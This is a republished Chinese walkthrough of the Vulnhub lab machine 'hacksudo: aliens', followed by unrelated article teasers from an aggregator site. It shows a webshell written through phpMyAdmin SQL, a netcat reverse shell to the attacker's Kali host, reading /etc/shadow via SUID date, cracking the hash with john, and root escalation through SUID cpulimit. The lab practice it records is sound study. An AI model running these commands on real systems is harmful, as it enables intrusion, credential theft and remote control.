Vulnhub: hacksudo: aliens靶机

news2024/11/15 21:24:39

kali:192.168.111.111

靶机:192.168.111.175

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.175

目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码

登录9000端口的phpmyadmin,执行sql语句写入webshell

select '<?php system($_GET["cmd"]);?>' into outfile '/var/www/html/shell.php'

成功执行命令

http://192.168.111.175/shell.php?cmd=id

获得反弹shell

http://192.168.111.175/shell.php?cmd=nc -e /bin/bash 192.168.111.111 4444

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

利用方法:https://gtfobins.github.io/gtfobins/date/#suid

查看/etc/shadow文件,利用john爆破用户密码密文

/usr/bin/date -f /etc/shadow

echo '$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1' > hash
​
john hash --wordlist=/usr/share/wordlists/rockyou.txt

切换到hacksudo用户后查看suid权限的文件

find / -perm -u=s 2> /dev/null

利用方法:https://gtfobins.github.io/gtfobins/cpulimit/#suid

提升为root

/home/hacksudo/Downloads/cpulimit -l 100 -f -- /bin/sh -p

flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/832420.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

节日福利发什么?OI易问卷调查员工意见,“卷”赢其他公司

节日福利发什么?OI易问卷调查员工意见,“卷”赢其他公司

春节、妇女节、端午节、中秋节、元宵节、周年庆……近几年各公司之间的员工福利比拼“卷”上新高度&#xff0c;让HR、行政每逢佳节倍焦虑。 节日福利是表达公司对员工的关心和感谢&#xff0c;同时提高员工的归属感和满意度。礼品、购物券、节日慰问金、节日活动、食品饮料……
阅读更多...
七牛云存储绑定域名

七牛云存储绑定域名

1、七牛云添加 加速域名方法&#xff1a; 注意&#xff1a;七牛云新增域名 需要 和 网站 解析的二级域名保持一致 其他值参考 如何绑定 使用七牛云托管视频&#xff0c;使用cdn加速
阅读更多...
网工内推 | 云计算工程师专场,CCNP/HCIP认证优先

网工内推 | 云计算工程师专场,CCNP/HCIP认证优先

01 弧聚科技 招聘岗位&#xff1a;网络工程师&#xff08;云计算方向&#xff09; 职责描述&#xff1a; 1、作为H3C初级云计算交付工程资源培养对象&#xff0c;需配合完成相关华三产品及服务规范培训。 2、培训赋能后&#xff0c;安排到H3C云项目交付中进行项目交付及驻场支…
阅读更多...
Java基础篇_1.5——程序流程控制之循环结构【包含各种图形练习】

Java基础篇_1.5——程序流程控制之循环结构【包含各种图形练习】

1、循环结构 循环&#xff1a;java中的循环有 while / do-while / for 。循环结构的特点是给定的循环条件成立时&#xff0c;反复执行某段程序&#xff0c;直到循环条件不成立。 1.2 while循环 定义变量并赋初始值 while(循环条件){// 循环体&#xff0c;要改变循环变量 } 注意…
阅读更多...
【计算机网络】应用层协议 -- DNS协议

【计算机网络】应用层协议 -- DNS协议

文章目录 1. DNS背景2. 域名简介3. 域名解析过程4. 使用dig查看DNS过程 1. DNS背景 DNS&#xff08;Domain Name System&#xff0c;域名系统&#xff09;协议&#xff0c;是一个用来将域名转化为IP地址的应用层协议。 TCP/IP当中通过IP地址和端口号的方式&#xff0c;来确定…
阅读更多...
pygame示例滚动的气球

pygame示例滚动的气球

pygame示例滚动的气球 使用pygame实现一个滚动的气球。 import sys, pygame # 将有限的常量和函数集放入脚本的全局名称空间中 from pygame.locals import *# 初始化pygame模块 pygame.init() # 创建图形窗口&#xff0c;pygame把图形表示为Surface对象 size width, height …
阅读更多...
增强知识保护和知识管理:PDM系统的知识库特色

增强知识保护和知识管理:PDM系统的知识库特色

在现代竞争激烈的商业环境中&#xff0c;知识保护和知识管理对企业的发展至关重要。PDM系统&#xff08;Product Data Management&#xff0c;产品数据管理&#xff09;作为一款强大的数字化工具&#xff0c;具备丰富的知识库特色&#xff0c;帮助企业增强知识保护和知识管理的…
阅读更多...
2023年华数杯C题详细思路

2023年华数杯C题详细思路

2023年华数杯作为与国赛同频的比赛&#xff08;都是周四6点发题&#xff0c;周日晚8点交卷&#xff09;&#xff0c;也是暑期唯一一个正式比赛。今年的报名队伍已经高达6000多对。基于这么多的人数进行国赛前队伍的练习&#xff0c;以及其他用途。为了方便大家跟更好的选题&…
阅读更多...
夏日启航 奔向云端 技术实践闭门交流会 | 专场回顾

夏日启航 奔向云端 技术实践闭门交流会 | 专场回顾

7月28日&#xff0c;华锐技术ACLUB联合亚马逊云科技在上海华锐9号楼举办了“夏日启航 奔向云端 技术实践闭门交流会”沙龙活动&#xff0c;与上海地区近30家量化机构的投研和技术人员一起&#xff0c;就软硬加速、云计算和HPC等技术如何实践于量化投资&#xff0c;进行了深入探…
阅读更多...
Java框架(九)--Spring Boot入门(2)

Java框架(九)--Spring Boot入门(2)

SpringBoot 核心功能讲解 SpringBoot之web请求静态资源 我们可以在浏览器访问src/main/resources/static目录下的静态资源&#xff0c;在此目录下新建test.html <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8">&…
阅读更多...
MybatisPlus实战笔记

MybatisPlus实战笔记

概述 Mybatis支持定制化SQL、存储过程以及高级映射&#xff0c;避免几乎所有的 JDBC 代码和手动设置参数以及获取结果集。可以使用简单的 XML 或注解来配置和映射原生信息&#xff0c;将接口和Java的POJO映射成数据库中的记录。 缺点&#xff1a; SQL工作量很大&#xff0c;尤…
阅读更多...
结构体和 Json 相互转换(序列化反序列化)

结构体和 Json 相互转换(序列化反序列化)

关于 JSON 数据 JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写。同时也 易于机器解析和生成。RESTfull Api 接口中返回的数据都是 json 数据。 Json 的基本格式如下&#xff1a; { "a": "Hello", "b": "…
阅读更多...
DC-2靶机

DC-2靶机

文章目录 信息收集漏洞发现漏洞利用 DC-2介绍 DC-2环境下载 请注意&#xff0c;您需要将渗透测试设备上的 hosts 文件设置为&#xff1a; 192.168.0.145 dc-2 显然&#xff0c;将 192.168.0.145 替换为 DC-2 的实际 IP 地址。 它将使生活变得更加简单&#xff08;如果没有它&am…
阅读更多...
【Linux】从0到1实现一个进度条小程序

【Linux】从0到1实现一个进度条小程序

个人主页&#xff1a;&#x1f35d;在肯德基吃麻辣烫 我的gitee&#xff1a;gitee仓库 分享一句喜欢的话&#xff1a;热烈的火焰&#xff0c;冰封在最沉默的火山深处 文章目录 前言一、理解回车 \r 和换行 \n二、初步认识缓冲区1. 认识第一个函数&#xff1a;sleep2.观察缓冲区…
阅读更多...
固态继电器:电气开关的革命

固态继电器:电气开关的革命

简介&#xff1a;在电气工程领域&#xff0c;固态技术的发展为各个领域的显着进步铺平了道路。固态继电器 (SSR) 就是其中一项备受关注的创新。与传统机电继电器不同&#xff0c;SSR 采用固态元件&#xff0c;具有许多优点&#xff0c;例如更高的可靠性、更快的响应时间和增强的…
阅读更多...
dvwa靶场通关(十)

dvwa靶场通关(十)

第十关&#xff1a;DOM Based Cross Site Scripting (XSS) DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模型Document Objeet Model&#xff0c;DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口&#xff0c;它允许程序或脚本动态地访问和更新文档内容、…
阅读更多...
有效的括号字符串(力扣)动态规划、贪心 JAVA

有效的括号字符串(力扣)动态规划、贪心 JAVA

给你一个只包含三种字符的字符串&#xff0c;支持的字符类型分别是 ‘(’、‘)’ 和 ‘*’。请你检验这个字符串是否为有效字符串&#xff0c;如果是有效字符串返回true 。 有效字符串符合如下规则&#xff1a; 任何左括号 ‘(’ 必须有相应的右括号 ‘)’。 任何右括号 ‘)’ …
阅读更多...
postgresql表膨胀处理之pgcompacttable部署及使用

postgresql表膨胀处理之pgcompacttable部署及使用

环境&#xff1a; 1&#xff09;redhat-release&#xff1a;CentOS Linux release 7.6.1810 (Core) 2&#xff09;database version&#xff1a;postgresql 14.6 一、添加pgstattuple pgcompacttable工具使用过程中需要依赖pgstattuple&#xff0c;因此需先添加pgstattuple…
阅读更多...
[C++]01.基础,数据类型,运算符

[C++]01.基础,数据类型,运算符

01.基础,数据类型,运算符 一.C基础入门1.HelloWorld2.注释3.变量4.常量5.关键字6.命名规则 二.数据类型1.整形2.sizeof关键字3.浮点型4.字符型5.转义字符6.字符串型7.布尔类型8.数据的输入 三.运算符1.算数运算符2.赋值运算符3.比较运算符4.逻辑运算符 一.C基础入门 1.HelloWo…
阅读更多...
【雕爷学编程】MicroPython动手做(30)——物联网之Blynk 4

【雕爷学编程】MicroPython动手做(30)——物联网之Blynk 4

知识点&#xff1a;什么是掌控板&#xff1f; 掌控板是一块普及STEAM创客教育、人工智能教育、机器人编程教育的开源智能硬件。它集成ESP-32高性能双核芯片&#xff0c;支持WiFi和蓝牙双模通信&#xff0c;可作为物联网节点&#xff0c;实现物联网应用。同时掌控板上集成了OLED…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023